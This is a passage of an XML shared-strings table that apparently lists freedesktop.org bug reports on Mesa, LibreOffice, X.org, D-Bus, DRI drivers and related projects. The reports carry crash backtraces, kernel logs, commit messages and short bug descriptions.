    <t>FREEDESKTOP.ORG-63084</t>
  </si>
  <si>
    <t>can't login to libopenraw.freedesktop.org</t>
  </si>
  <si>
    <t>I can't login to libopenraw.freedesktop.org.
I am the admin
The wiki account is HubertFiguiere
If I look at recent changes The changes I made are said to have been made by annarchy.
I don't know what happen but something is obviously wrong.
I don't think it is related to bug 55335 because things were working fine.</t>
  </si>
  <si>
    <t>MESA-95000</t>
  </si>
  <si>
    <t>deqp: assert in dEQP-GLES3.functional.vertex_arrays.single_attribute.strides.fixed.user_ptr_stride17_components2_quads1</t>
  </si>
  <si>
    <t>unhandled format in u_vbuf_translate:
(gdb) bt
#0  0xb69dd8b8 in raise () from /lib/libc.so.6
#1  0xb69dee50 in abort () from /lib/libc.so.6
#2  0xb69d5fc0 in __assert_fail_base () from /lib/libc.so.6
#3  0xb69d609c in __assert_fail () from /lib/libc.so.6
#4  0xb638c6b0 in u_vbuf_translate_begin (mgr=0x14aae60 start_vertex=0 num_vertices=6 start_instance=0 num_instances=1 start_index=0 num_indices=6 min_index=0 
    unroll_indices=0 '\000') at ../../../../src/gallium/auxiliary/util/u_vbuf.c:647
#5  0xb638e790 in u_vbuf_draw_vbo (mgr=0x14aae60 info=0xbeffed14) at ../../../../src/gallium/auxiliary/util/u_vbuf.c:1243
#6  0xb62e0cd0 in cso_draw_vbo (cso=0x14aa770 info=0xbeffed14) at ../../../../src/gallium/auxiliary/cso_cache/cso_context.c:1626
#7  0xb61497d0 in st_draw_vbo (ctx=0x14c9e50 prims=0xbeffedbc nr_prims=1 ib=0x0 index_bounds_valid=1 '\001' min_index=0 max_index=5 tfb_vertcount=0x0 stream=0 indirect=0x0)
    at ../../../src/mesa/state_tracker/st_draw.c:251
#8  0xb60e1fd8 in vbo_draw_arrays (ctx=0x14c9e50 mode=4 start=0 count=6 numInstances=1 baseInstance=0) at ../../../src/mesa/vbo/vbo_exec_array.c:497
#9  0xb60e2da8 in vbo_exec_DrawArrays (mode=4 start=0 count=6) at ../../../src/mesa/vbo/vbo_exec_array.c:649
#10 0xb6881a20 in shared_dispatch_stub_310 (mode=4 first=0 count=6) at ./shared-glapi/glapi_mapi_tmp.h:18471
#11 0x00c3aa68 in glu::CallLogWrapper::glDrawArrays (this=0x14b8410 mode=4 first=0 count=6) at /home/robclark/src/deqp/framework/opengl/gluCallLogWrapper.inl:953
#12 0x01031224 in sglr::GLContext::drawArrays (this=0x14ba280 mode=4 first=0 count=6) at /home/robclark/src/deqp/framework/opengl/simplereference/sglrGLContext.cpp:787
#13 0x00f65ea0 in deqp::gls::ContextArrayPack::render (this=0x137f000 primitive=deqp::gls::Array::PRIMITIVE_TRIANGLES firstVertex=0 vertexCount=6 useVao=false coordScale=0.45009616 
    colorScale=1) at /home/robclark/src/deqp/modules/glshared/glsVertexArrayTests.cpp:1189
#14 0x00f6a384 in deqp::gls::MultiVertexArrayTest::iterate (this=0x14b8980) at /home/robclark/src/deqp/modules/glshared/glsVertexArrayTests.cpp:2108
#15 0x00684c48 in deqp::gles3::TestCaseWrapper::iterate (this=0x137e400 testCase=0x14b8980) at /home/robclark/src/deqp/modules/gles3/tes3TestPackage.cpp:90
#16 0x00bbdb38 in tcu::TestSessionExecutor::iterateTestCase (this=0x137dff0 testCase=0x14b8980) at /home/robclark/src/deqp/framework/common/tcuTestSessionExecutor.cpp:270
#17 0x00bbcf48 in tcu::TestSessionExecutor::iterate (this=0x137dff0) at /home/robclark/src/deqp/framework/common/tcuTestSessionExecutor.cpp:133
#18 0x00b91704 in tcu::App::iterate (this=0x137e228) at /home/robclark/src/deqp/framework/common/tcuApp.cpp:136
#19 0x00681188 in main (argc=5 argv=0xbefff5f4) at /home/robclark/src/deqp/framework/platform/tcuMain.cpp:55
(gdb) print mgr-&gt;ve-&gt;native_format[i]
$2 = PIPE_FORMAT_R32G32_FIXED</t>
  </si>
  <si>
    <t>LIBREOFFICE-36927</t>
  </si>
  <si>
    <t>Some content not localized (all languages)</t>
  </si>
  <si>
    <t>I tested Italian localization and some some content are not localized. I can see:
- Content of Stile and formatting
- Content of Navigator
- Writer and Calc statusbar
It's a regression from 4.4 Beta 3</t>
  </si>
  <si>
    <t>MESA-33792</t>
  </si>
  <si>
    <t>[r600g] Evergreen vertex shaders transform vertices incorrectly in wine programs</t>
  </si>
  <si>
    <t>All the wine applications and games using vertex shaders that I've tried in
evergreen position the vertices incorrectly.
All of them render correctly using llvmpipe and an r300g card/driver.
Graphics Card: ATI Technologies Inc Juniper [Radeon HD 5750 Series]
CPU: Intel Core Duo 1.8 Ghz 2.5 GB RAM
Linux kernel 2.6.37 libdrm 2.4.23
Latest Mesa git
Games tested:
Call of Cthulhu: Dark Corners of the Earth
Portal
Sam &amp; Max Season One
Tales of Monkey Island
Back to the Future: The Game
I'll post logs and screenshots for Tales of Monkey Island</t>
  </si>
  <si>
    <t>LIBREOFFICE-78743</t>
  </si>
  <si>
    <t>Other: Find All Result Window Opens and Closes Immediately</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Command-F
2. Enter Search Term in Search Bar at the Bottom
3. Press Find All Button
Current behavior: Window with results opens and closes immediately 
Expected behavior: Window stays open
Operating System: Mac OS X
Version: 4.2.4.2 release</t>
  </si>
  <si>
    <t>pboe</t>
  </si>
  <si>
    <t>LIBFPRINT-47982</t>
  </si>
  <si>
    <t>rules in 60-fprint-autosuspend.rules installed by libfprint cause errors with udev</t>
  </si>
  <si>
    <t>See also these related redhat bugs:
https://bugzilla.redhat.com/show_bug.cgi?id=650532
https://bugzilla.redhat.com/show_bug.cgi?id=744637
The issue results in heavily slowing down the boot process.</t>
  </si>
  <si>
    <t>LIBREOFFICE-80403</t>
  </si>
  <si>
    <t>AutoCorrect - parse XML files using XFastParser ...</t>
  </si>
  <si>
    <t>We should parse our auto-correct XML files using the nice tokenizing XFastParser instead of the significantly slower SAX parser interface. Code is here:
editeng/source/misc/SvXMLAutoCorrectImport.cxx
The XFastParser interface is in offapi and needs a hash function to tokenise its input you'd want to look at sax/source/fastparser/fastparser.cxx to see how that works I guess.
This would move the parsing into its own thread.
Then again - perhaps that is too complicated we could get at least some win by moving to xmlreader/ perhaps.
Thanks !</t>
  </si>
  <si>
    <t>LIBREOFFICE-43984</t>
  </si>
  <si>
    <t>Update VCL.xcu for Chinese (Traditional) language</t>
  </si>
  <si>
    <t>Created attachment 54600
Upate the Chinese fonts list to fit the situation nowdays.
Chinese (Traditional) language has two variants zh-tw and zh-hk.
The old VCL.xcu has some fonts which are not common on major platform (Windows Linux and Mac) but used by StarSuite and some outdated free fonts for Chinese (Traditional). It didn't support MacOS X yet so I edit it to fit the situation today.
Goals:
1. Remove fonts provided only by StarSuite: æ–¹æ­£æ˜Žé«” MSung Light TC æ–¹æ­£é»‘ä½“
2. Remove outdated free Chinese fonts which is not maintained anymore: AR PL Mingti2L Big5 æ–‡é¼ŽPLç´°ä¸Šæµ·å®‹Uni AR PL ShanHeiSun Uni æ–‡é¼Žï¼°ï¼¬æ–°å®‹ AR PL New Sung æ–‡é¼ŽPLä¸­æ¥·Uni AR PL ZenKai Uni
3. Add æ–‡æ³‰é©›å¾®ç±³é»‘ æ–‡æ³‰é©›ç­‰å¯¬å¾®ç±³é»‘ and AR PL UMing TW or AR PL UMing HK which are almost all the default fonts for Chinese in Linux distributions to appropriate sections and set them to the first priority to let fontconfig can pick it right away.
4. Add é»‘é«”-ç¹ (Heiti TC) å„·é»‘ Pro (LiHei Pro) and å„·å®‹ Pro (LiSong Pro) which are the default Chinese font in MacOS 10.6 and before to the second priority. System will pick those fonts before the fonts come from Windows platform (eg. å¾®è»Ÿæ­£é»‘é«”æ–°ç´°æ˜Žé«” (PMingLiU)ç´°æ˜Žé«” (MingLiU)) to fit Mac's look and feel.
I would like it be release at testing builds as soon as possible to let Chinese (Traditional) users to test about this update.</t>
  </si>
  <si>
    <t>XORG-2455</t>
  </si>
  <si>
    <t>x86emu doesn't handle the JNL instruction correctly</t>
  </si>
  <si>
    <t>in xc/extras/x86emu/src/x86emu/ops2.c:
   131        case 0x8d:
   132          name = JNL\t
   133          cond = xorl(ACCESS_FLAG(F_SF) ACCESS_FLAG(F_OF))
this should be
                cond = !(xorl(ACCESS_FLAG(F_SF) ACCESS_FLAG(F_OF)))
see the case for JNLE below.
   134          break
   135        case 0x8e:
   136          name = JLE\t
   137          cond = (xorl(ACCESS_FLAG(F_SF) ACCESS_FLAG(F_OF)) ||
   138                  ACCESS_FLAG(F_ZF))
   139          break
   140        case 0x8f:
   141          name = JNLE\t
   142          cond = !(xorl(ACCESS_FLAG(F_SF) ACCESS_FLAG(F_OF)) ||
   143                   ACCESS_FLAG(F_ZF))
   144          break</t>
  </si>
  <si>
    <t>dwong_7086</t>
  </si>
  <si>
    <t>UIM-11966</t>
  </si>
  <si>
    <t>Requiring m17n-db installed at build time</t>
  </si>
  <si>
    <t>Right now uim is requring all of m17n-db installed at the build time to get symlinks for a dozen images created. which is used for the icon. however this prevents to get another icon without rebuilding if it's provided as the package and m17n-db contains new languages. when new one is available on the system it should be applied without rebuilding uim.</t>
  </si>
  <si>
    <t>DBUS-90004</t>
  </si>
  <si>
    <t>Missing newline in dbus_trace_ref verbose output</t>
  </si>
  <si>
    <t>dbus code provide an environment variable to DBUS_CONNECTION_TRACE to dump connection referencing like shown below.
13465: [dbus/dbus-internals.c(521):_dbus_trace_ref] DBusConnection 0x1490e00 3 -&gt; 4 refs (ref_unlocked)[dbus/dbus-internals.c(521):_dbus_trace_ref]
This output misses a newline at the end of each reference dump. 
The expected output format is shown below: 
30122: [dbus/dbus-internals.c(521):_dbus_trace_ref] DBusConnection 0x1e1cf50 6 -&gt; 5 refs (unref_unlocked)
30122: [dbus/dbus-internals.c(521):_dbus_trace_ref] DBusConnection 0x1e1cf50 5 -&gt; 6 refs (ref_unlocked)
30122: [dbus/dbus-internals.c(521):_dbus_trace_ref] DBusConnection 0x1e1cf50 6 -&gt; 5 refs (unref)
The appended patch fixes this issue.</t>
  </si>
  <si>
    <t>DRI-69791</t>
  </si>
  <si>
    <t>[GM45 Bisected]Boot system has [    1.894068] [drm:intel_pipe_config_compare] *ERROR* mismatch in adjusted_mode.flags(DRM_MODE_FLAG_NHSYNC) (expected 2 found 0)</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 86505
dmesg
System Environment:
--------------------------
Arch:           x86_64
Platform:       GM45
Kernel:         (drm-intel-nightly)15425dbba39114d8dfbb12f6ddb1f39d0cae144a
Bug detailed description:
-----------------------------
It happens on GM45 with -fixes -nightly -queued kernel.
Boot system [  1.894068] [drm:intel_pipe_config_compare] *ERROR* mismatch in adjusted_mode.flags(DRM_MODE_FLAG_NHSYNC) (expected 2 found 0) appears in dmesg.
It is the same as Bug 66482.
Bisect shows: 2960bc9cceecb5d556ce1c07656a6609e2f7e8b0 is the first bad commit.
commit 2960bc9cceecb5d556ce1c07656a6609e2f7e8b0
Author:     Imre Deak 
AuthorDate: Tue Jul 30 13:36:32 2013 +0300
Commit:     Daniel Vetter 
CommitDate: Mon Aug 5 19:04:05 2013 +0200
    drm/i915: make user mode sync polarity setting explicit
    Userspace can pass a mode with an unspecified vsync/hsync polarity
    setting. All encoders in the Intel driver take this to mean a negative
    polarity setting. The HW readout/state checker code on the other hand
    needs these flags to be explicitly set otherwise the state checker will
    WARN about the mismatch.
    Get rid of the WARN by making the polarity setting explicit in the
    adjusted mode flags based on the requested mode flags. This will keep
    the existing behavior otherwise.
    Note that we could guess from the other timing parameters whether the
    user wanted a VESA or other standard mode and set the polarity
    accordingly. This is what the NV driver does
    (drivers/gpu/drm/nouveau/dispnv04/crtc.c) but I think that's not very
    exact and would change the existing behavior of the Intel driver.
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=65442
    Signed-off-by: Imre Deak 
    Tested-by: cancanfeng 
    Reviewed-by: Chris Wilson 
    Signed-off-by: Daniel Vetter </t>
  </si>
  <si>
    <t>DRI-35936</t>
  </si>
  <si>
    <t>[915GM] gpu hang during gdm login [pipelined fencing?]</t>
  </si>
  <si>
    <t>This is on an EeePC 900 with:
 Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 04)
You can see the kernel logs at the linked debian bug report.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-35164</t>
  </si>
  <si>
    <t>[PATCH] Support for Microsoft Natural Keyboard 4000</t>
  </si>
  <si>
    <t>XORG-50019</t>
  </si>
  <si>
    <t>after few (de)activating kwin effect xorg crash</t>
  </si>
  <si>
    <t>Created attachment 61731
xorg.log
HW: AMD A3870K GPU 6550D on-CPU.
System: Gentoo ~amd64
How to reproduce:
1) let system start with activated kwin OpenGL effects
2) press ALT-F11 (de/activate effects) (with combination with Chrome or Firefox is best for fast reproduce)
3) after few presses xorg die.
Dmesg here xorg with -O0 and -ggdb etc. in attachment.
$ dmesg | grep drm -C2
ACPI: acpi_idle registered with cpuidle
Linux agpgart interface v0.103
[drm] Initialized drm 1.1.0 20060810
[drm] radeon defaulting to kernel modesetting.
[drm] radeon kernel modesetting enabled.
[drm] initializing kernel modesetting (SUMO 0x1002:0x9640 0x1043:0x84C8).
[drm] register mmio base: 0xFEB00000
[drm] register mmio size: 262144
ATOM BIOS: General
radeon 0000:00:01.0: VRAM: 256M 0x0000000000000000 - 0x000000000FFFFFFF (256M used)
radeon 0000:00:01.0: GTT: 512M 0x0000000010000000 - 0x000000002FFFFFFF
[drm] Detected VRAM RAM=256M BAR=256M
[drm] RAM width 32bits DDR
[TTM] Zone  kernel: Available graphics memory: 3951330 kiB
[TTM] Zone   dma32: Available graphics memory: 2097152 kiB
[TTM] Initializing pool allocator
[TTM] Initializing DMA pool allocator
[drm] radeon: 256M of VRAM memory ready
[drm] radeon: 512M of GTT memory ready.
[drm] Supports vblank timestamp caching Rev 1 (10.10.2010).
[drm] Driver supports precise vblank timestamp query.
radeon 0000:00:01.0: irq 42 for MSI/MSI-X
radeon 0000:00:01.0: radeon: using MSI.
[drm] radeon: irq initialized.
[drm] GART: num cpu pages 131072 num gpu pages 131072
[drm] radeon: ib pool ready.
[drm] Loading SUMO Microcode
[drm] PCIE GART of 512M enabled (table at 0x0000000000040000).
radeon 0000:00:01.0: WB enabled
[drm] fence driver on ring 0 use gpu addr 0x10000c00 and cpu addr 0xffff8802244a3c00
[drm] ring test on 0 succeeded in 1 usecs
[drm] ib test on ring 0 succeeded in 0 usecs
[drm] Radeon Display Connectors
[drm] Connector 0:
[drm]   VGA
[drm]   HPD2
[drm]   DDC: 0x6440 0x6440 0x6444 0x6444 0x6448 0x6448 0x644c 0x644c
[drm]   Encoders:
[drm]     CRT1: INTERNAL_UNIPHY2
[drm]     CRT1: NUTMEG
[drm] Connector 1:
[drm]   DVI-D
[drm]   HPD1
[drm]   DDC: 0x6430 0x6430 0x6434 0x6434 0x6438 0x6438 0x643c 0x643c
[drm]   Encoders:
[drm]     DFP1: INTERNAL_UNIPHY2
[drm] Connector 2:
[drm]   DisplayPort
[drm]   HPD3
[drm]   DDC: 0x6450 0x6450 0x6454 0x6454 0x6458 0x6458 0x645c 0x645c
[drm]   Encoders:
[drm]     DFP2: INTERNAL_UNIPHY
[drm] Internal thermal controller without fan control
[drm] radeon: power management initialized
[drm] fb mappable at 0xC0142000
[drm] vram apper at 0xC0000000
[drm] size 8294400
[drm] fb depth is 24
[drm]    pitch is 7680
fbcon: radeondrmfb (fb0) is primary device
Console: switching to colour frame buffer device 240x67
fb0: radeondrmfb frame buffer device
drm: registered panic notifier
[drm] Initialized radeon 2.15.0 20080528 for 0000:00:01.0 on minor 0</t>
  </si>
  <si>
    <t>DBUS-53499</t>
  </si>
  <si>
    <t>dbus_address_escape_value may fail for bytes larger than 127</t>
  </si>
  <si>
    <t>When I try to start pulseaudio and got the error message:
E: [pulseaudio] module-dbus-protocol.c: dbus_server_listen() failed: org.freedesktop.DBus.Error.BadAddress: In D-Bus address percent character was followed by characters other than hex digits
I have tried to debug this and my understanding is that dbus_address_escape_value will fail to escape bytes with the high bit set when char is signed.
Pulsaudio creates a path to a socket under the home directory.  In my case with an o-diaeresis in the home directory name that path is
/home/gÃ¶ran/.pulse/bc6e8f186e8afde79d2ddb0047756edd-runtime/dbus-socket
The Ã¶ is UTF-i encoded that is \303\266 in octal.  Pulseaudio sends this to dbus_address_escape_value which passes it on to _dbus_address_append_escaped where it is traversed by a pointer with the type const char *.  When it reaches the first byte in the Ã¶ the \303 this byte is correctly considered needing escaping so it is sent to _dbus_string_append_byte_as_hex.
The argument with the byte in this function has the type int so the normal C promotion is made.  Since char is signed in my case it interpreted as -61 and this is the value used in the function.  When checking for the first hex number the index into hexdigits is byte &gt;&gt; 4 or -4 i.e. somewhere just before the array in the memory.  Apparently there happens to be \377 there this time.  Next it looks up the low four bits using the expression byte &amp; 0x0f and that gets right since it completely disregards any sign extension.
The end result is this string.
/home/g%\377\063%\365\066ran/.pulse/bc6e8f186e8afde79d2ddb0047756edd-runtime/dbus-socket
Note that \063 is correctly the ASCII code for 3 and \066 means 6.  So the low hex digit are correct.  But dbus_server_listen is correct in complaining that the first byte after the percent signs are not hexadecimal digits.
All this was done on a Fedora 17 system with these package versions:
dbus-libs-1.4.10-4.fc17.x86_64
pulseaudio-1.1-9.fc17.x86_64</t>
  </si>
  <si>
    <t>XORG-86705</t>
  </si>
  <si>
    <t>X crashes when USB devices above event 267 are added</t>
  </si>
  <si>
    <t>In Bug Report 28682 (bugzilla.kernel.org) Alexander Todorov was hitting the EVDEV_MINORS limit of 32 in his attempts to form a network of USB keyboards.  His initial thought was simply to raise the hard coded limit but this turned out to interfere with other files.  The bug resolution involved retaining the legacy 32 events but adding a new series numbered from 256 to c. 1024.
Like Dr. Todorov I have been working with a network of USB keyboards (currently 40).
 (A picture of my own (pre-USB) system can be seen at
 http://members.dslextreme.com/users/juanslayton/dscf0062.jpg  )
I also had hit the EVDEV_MINORS limit some years ago and had in fact implemented Dr. Todorovâ€™s original proposal of raising the limit in kernel files input.c and evdev.c.  In my limited application this seemed to work OK.  But it has been a pain to have to hack the kernel every time I want to change computers so I am real happy to see the fix has been implemented in the current kernel.
Or I would be if I could get it to work.  As I add devices things start off smoothly.  They first register events 0 to 31 then jump to 256 and proceed up to about 267.  At that point any attempt to add another keyboard causes a crash with the message (in part):
lxterminal:  Fatal IO error 11 (Resource temporarily unavailable) on X server  :1.0.
lxpanel:  Fatal IO error 11 (Resource temporarily unavailable) on X server  :1.
clipit:  Fatal IO error 11 (Resource temporarily unavailable) on X server  :1.
pnmixer:  Fatal IO error 11 (Resource temporarily unavailable on X server :1.
I am running f.c.20 on an HP 2000-219DX  laptop.  The student keyboards are Logitech K360s linked to 7 Logitech â€œunifying receivers.â€
I submitted this bug to bugzilla.kernel.org and received the following reply:
If it is X that is crashing you need to log the bug against X. If it is the kernel crashing please post the dmesg/oops. Thanks!
It does seem to be X that is crashing.  I'm not sure I have sent this to the right component....</t>
  </si>
  <si>
    <t>juanslayton</t>
  </si>
  <si>
    <t>MESA-107627</t>
  </si>
  <si>
    <t>Shader cache causes Dota 2 crashes on amdgpu</t>
  </si>
  <si>
    <t>I was recommend to open issue from
https://github.com/flathub/com.valvesoftware.Steam/issues/130#issuecomment-414398386
for my graphic card Radeon RX 550 4G.
For more information please kindly follow the issue above.
Remark
Now i can't play dota 2 on steam  using flatpak.</t>
  </si>
  <si>
    <t>vibolvireak</t>
  </si>
  <si>
    <t>TELEPATHY-58851</t>
  </si>
  <si>
    <t>Compile error: Missing (element-type) annotation.</t>
  </si>
  <si>
    <t>Created attachment 72238
Compile error output
telepathy-glib from jhbuild does not compile for me with Debian Wheezy.
dbus.c:884: Warning: TelepathyGLib: tp_asv_get_bytes: return value: Missing (element-type) annotation
capabilities.c:87: Warning: TelepathyGLib: tp_capabilities_get_channel_classes: return value: Missing (element-type) annotation
client-channel-factory.c:142: Warning: TelepathyGLib: tp_client_channel_factory_dup_channel_features: return value: Missing (element-type) annotation
:: Fatal: TelepathyGLib: warnings configured as fatal
:: Fatal: TelepathyGLib: warnings configured as fatal
Attached is the log.</t>
  </si>
  <si>
    <t>hnasarat</t>
  </si>
  <si>
    <t>DBUS-38120</t>
  </si>
  <si>
    <t>byteswapping a message doesn't change the byte-order mark</t>
  </si>
  <si>
    <t>As described in (at least) these mailing list messages:
http://lists.freedesktop.org/archives/dbus/2007-March/007357.html
http://lists.freedesktop.org/archives/dbus/2011-May/014408.html
when libdbus byteswaps a message into native order it doesn't alter byte 0 of the fixed header (the byte order). Normally this is harmless but if you're going to forward the message to another connection (e.g. you are dbus-daemon) badness occurs.
If someone had opened a bug back in 2007 this might have been fixed by now. Or maybe not.
I believe I've fixed this (the fix that Havoc suggested in 2007 looks obviously-correct) but I'm going to construct a test-case so this doesn't come back.</t>
  </si>
  <si>
    <t>LIBREOFFICE-67094</t>
  </si>
  <si>
    <t>Spreadsheet Reads Any Number of Spaces in Cell as a Single Space</t>
  </si>
  <si>
    <t>Steps to Reproduce:
1. Open Spreadsheet
2. Type this          is a test -- lots of spaces
3. Save as ODS
4. Close
5. Open
Expected:
You see the text as you wrote it
Observed
You see this is a test with a single space
Also exists on master</t>
  </si>
  <si>
    <t>XORG-46764</t>
  </si>
  <si>
    <t>xorg/driver/xf86-video-intel 2.18.0 xorg crashes in KDE</t>
  </si>
  <si>
    <t>System : KDE 4.8.0 ( opensuse 12.1 )  
3.3.0-rc5-1-desktop #1 SMP PREEMPT Mon Feb 27 02:38:40 UTC 2012 (0b7f048) x86_64 x86_64 x86_64 GNU/Linux
and kernel any kernel from 3.2.6 to 3.3.0 ( probably any kernel from 3.2.x ) 
xorg/driver/xf86-video-intel taken from http://cgit.freedesktop.org/xorg/driver/xf86-video-intel/  ( version 2.18.0 ) 
1. Driver compiled  with --enable-sna .
Switching composing( default sequence is Ctl-Alt-F12 )  in KDE will crash xorg. 
2. Driver compiled without --enable-sna  
Switching composing will work as expected .</t>
  </si>
  <si>
    <t>tomko9</t>
  </si>
  <si>
    <t>DRI-78687</t>
  </si>
  <si>
    <t>[All]Subcases dpms-lpsp and dpms-non-lpsp of igt/pm_pc8 fail</t>
  </si>
  <si>
    <t>==System Environment==
--------------------------
Regression: No. 
These case were not support before
Non-working platforms: BYT
==kernel==
--------------------------
-nightly: 2be456541ea41728002ccca2de5235f48d14326e (fails)
-queued: 70e1e0ec02dfe93650fb2c70824dc81e3eb5b2cc (fails)
    Author: Damien Lespiau 
    Date:   Tue May 13 23:32:24 2014 +0100
    drm/i915: Use for_each_crtc() when iterating through the CRTCs
    Patch done using the following semantic patch (thanks Daniel for the
    help!)
      @@
      iterator name list_for_each_entry
      iterator name for_each_crtc
      struct drm_crtc * crtc
      struct drm_device * dev
      @@
      -list_for_each_entry(crtc&amp;dev-&gt;mode_config.crtc_list head) {
      +for_each_crtc(devcrtc) {
        ...
      }
    Followed by a couple of fixups by hand (that spatch doesn't match the
    cases where list_for_each_entry() is not followed by a set of '{' '}'
    but I couldn't figure out a way to leave the '{' out of the iterator
    match).
    Signed-off-by: Damien Lespiau 
    Signed-off-by: Daniel Vetter 
-fixes: 05adaf1f101f25f40f12c29403e6488f0e45f6b6 (skips)
    Author: Jani Nikula 
    Date:   Fri May 9 14:52:34 2014 +0300
    drm/i915/vlv: reset VLV media force wake request register
    Media force wake get hangs the machine when the system is booted without
    displays attached. The assumption is that (at least some versions of)
    the firmware has skipped some initialization in that case.
    Empirical evidence suggests we need to reset the media force wake
    request register in addition to the render one to avoid hangs.
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=75895
    Reported-by: Imre Deak 
    Reported-by: Darren Hart 
    Tested-by: Darren Hart 
    Reviewed-by: Mika Kuoppala 
    Cc: stable@vger.kernel.org
    Signed-off-by: Jani Nikula 
==Bug detailed description==
-----------------------------
Subcases dpms-lpsp and dpms-non-lpsp of igt/pm_pc8 fail
Output:
./pm_pc8 --run-subtest dpms-non-lpsp
IGT-Version: 1.6-gd848a36 (x86_64) (Linux: 3.15.0-rc3_drm-intel-nightly_2be456_20140514+ x86_64)
Runtime PM support: 1
PC8 residency support: 0
Test assertion failure function modeset_subtest file pm_pc8.c:846:
Last errno: 2 No such file or directory
Failed assertion: wait_for_suspended()
Subtest dpms-non-lpsp: FAIL
==Reproduce steps==
---------------------------- 
1. ./pm_pc8 --run-subtest dpms-non-lpsp</t>
  </si>
  <si>
    <t>DRI-38081</t>
  </si>
  <si>
    <t>[snb] GPU/system hang</t>
  </si>
  <si>
    <t>Created attachment 47721
Xorg.log
Hi I use linux kernel 3.0.0-rc2 with intel xorg driver build from git and sometimes X hung and I can't do anything. Couldn't check if this was only X server hung or whole system because I didn't have other machine to try to login on hang laptop via ssh.
I've attached Xorg.log and kernel.log. Please let me know if I should provide some more information to help in investigation of this bug.</t>
  </si>
  <si>
    <t>LIBREOFFICE-67205</t>
  </si>
  <si>
    <t>CRITBINOM function description is wrong</t>
  </si>
  <si>
    <t>Reported by Sergio smarquespt@gmail.com
This affects HELP and UI in EN_US
Dana 22.7.2013. 23:11 SÃ©rgio Marques je napisao:
&gt;
&gt;
&gt; I donÂ´t have an bugzilla account. Can You do it? Or someone with an account there.
&gt; What needs to be fixed is:
&gt; UI:
&gt; File: sc/source/ui/src.po
&gt; Context:
&gt;  
&gt; scfuncs.src RID_SC_FUNCTION_DESCRIPTIONS2.SC_OPCODE_KRIT_BINOM 1 string.text
&gt;
&gt;
&gt;      Comment:  
&gt;
&gt; o6CUv
&gt;
&gt;
&gt; Border arguments of the binomial distribution.
&gt; To:
&gt; Context:
&gt;  
&gt; scfuncs.src RID_SC_FUNCTION_DESCRIPTIONS2.SC_OPCODE_CRIT_BINOM 1 string.text
&gt; Returns the smallest value for which the cumulative binomial distribution is greater than or equal to a criterion value.
&gt; Help files:
&gt; File:
&gt;  
&gt;
&gt; scalc/01.po
&gt; Context:
&gt;  
&gt; 04060183.xhp par_id3149254 49 help.text
&gt; Comment:
&gt;  
&gt;
&gt; yXdFy
&gt;
&gt; From:
&gt;
&gt; Returns the smallest value for which the cumulative binomialdistribution is less than or equal to a criterion value.
&gt;
&gt; To
&gt;
&gt; Returns the smallest value for which the cumulative binomialdistribution is greater than or equal to a criterion value.
&gt;
&gt; If someone could do it I would appreciate it.
&gt;
&gt; http://docs.oasis-open.org/office/v1.2/os/OpenDocument-v1.2-os-part2.html#CRITBINOM
&gt;
&gt; Regards</t>
  </si>
  <si>
    <t>POPPLER-6990</t>
  </si>
  <si>
    <t>Using cairo_user_font_backend_t is early at this time</t>
  </si>
  <si>
    <t>cairo_user_font_backend_t changes of poppler/CairoFontEngine.cc were committed
in rev 1.21. And the changes were commited with the following log message:
	* glib/poppler-action.cc:
	* glib/poppler-document.cc:
	* glib/poppler-page.cc:
	* poppler/CairoFontEngine.cc:
	* poppler/CairoFontEngine.h:
	* poppler/CairoOutputDev.cc:
	* poppler/CairoOutputDev.h:
	* poppler/Gfx.cc:
	* poppler/TextOutputDev.cc:  Fix various memory leaks.
But there isn't cairo_user_font_backend_t in the official cairo repository yet.
It's a wrong commit wasn't it?</t>
  </si>
  <si>
    <t>POPPLER-22305</t>
  </si>
  <si>
    <t>Allow building win32 relocatable dll with win32 native font backend</t>
  </si>
  <si>
    <t>Created attachment 26821
Build relocatable dll (the data path is determined on run time) + build native win32 font backend always when building win32
Following patch makes the use of the win32 native font backend even when built on win32 with gcc (mingw). It also determines the path of the poppler-data based on the install prefix on runtime.</t>
  </si>
  <si>
    <t>WAYLAND-67329</t>
  </si>
  <si>
    <t>Weston-launch for fbdev-backend.so is now broken now.</t>
  </si>
  <si>
    <t>Hi. I think it was this commit that broke it. http://cgit.freedesktop.org/wayland/weston/commit/?id=3c95e70496ac29f63c50c3f85458418ce1c81102
fbdev-backend also can be used from weston-launch (if you set permissions on /dev/fb0 for the user group) not just drm-backend</t>
  </si>
  <si>
    <t>MESA-102679</t>
  </si>
  <si>
    <t>[OpenGL CTS] KHR-GL45.copy_image.functional</t>
  </si>
  <si>
    <t>KHR-GL45.copy_image.functional fails on i965.  It's copying a GL_RGB10_A2 renderbuffer to a GL_R11F_G11F_B10F 2D array texture.
Looks like a small data difference or the alpha channel being toast: 0xc7f00004 vs 0xc7f00000.
My guess is that we need to land Jason's BLORP handling for uncommon formats.</t>
  </si>
  <si>
    <t>TELEPATHY-24209</t>
  </si>
  <si>
    <t>Release 0.10.0</t>
  </si>
  <si>
    <t>In practice hardly any distributions will ship 0.8.0 because they want TpAccount (for Moblin). However distributions want a bugfix-only branch that can support Moblin. It seems reasonable to delay feature development to 0.11.x have a very short 0.9.x branch (with no or minimal API additions) while we get feedback from people who're using the new API from 0.9.0 and ship 0.10.0 soon.</t>
  </si>
  <si>
    <t>DBUS-92028</t>
  </si>
  <si>
    <t>Autolaunch support broken on windows</t>
  </si>
  <si>
    <t>I recently tried to build dbus from the dbus-1.10 branch with cmake and run dbus-daemon.exe --session which fails with the message
Failed to start message bus: Address 'autolaunch' already used
After a switch to dbus-1.8 branch followed by a recompile a run with the same command line does not fail.
dbus verbose prints out the lines below which may give a hint about the root cause. What I can see is that:
First the daemon checks if the bus address is published [1]. After publishing the bus address [2] the daemon asks if the bus address is published [3] which is true and is interpreted as error condition.
It looks that something in the daemon initialization logic has been changed.
8: [dbus/dbus-memory.c(262):_dbus_decrement_fail_alloc_counter] TODO: memory allocation testing errors disabled for now
8: [dbus/dbus-dataslot.c(135):_dbus_data_slot_allocator_alloc] Allocated slot 0 on allocator 6DBE4338 total 1 slots allocated 1 used
8: [dbus/dbus-socket-set-poll.c(98):_dbus_socket_set_poll_new] new socket set at 00241590
